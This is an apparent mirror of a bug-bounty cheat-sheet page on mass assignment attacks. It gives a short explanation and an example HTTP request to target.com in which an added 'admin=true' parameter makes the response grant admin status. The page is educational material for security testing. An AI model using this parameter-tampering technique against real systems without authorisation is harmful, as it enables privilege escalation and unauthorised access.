Projects STRLCPY AllAboutBugBounty Files
🤬
395710e2
ROOT /
Mass Assignment.md
40 lines | ISO-8859-1 | 808 bytes

Mass Assignment Attack

Introduction

Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS

How to exploit

  • Normal request
POST /editdata HTTP/1.1
Host: target.com
...

username=daffa

The response

HTTP/1.1 200 OK
...

{"status":"success","username":"daffainfo","isAdmin":"false"}
  • Modified Request
POST /editdata HTTP/1.1
Host: target.com
...

username=daffa&admin=true
HTTP/1.1 200 OK
...

{"status":"success","username":"daffainfo","isAdmin":"true"}

References

Please wait...
Page is in error, reload to recover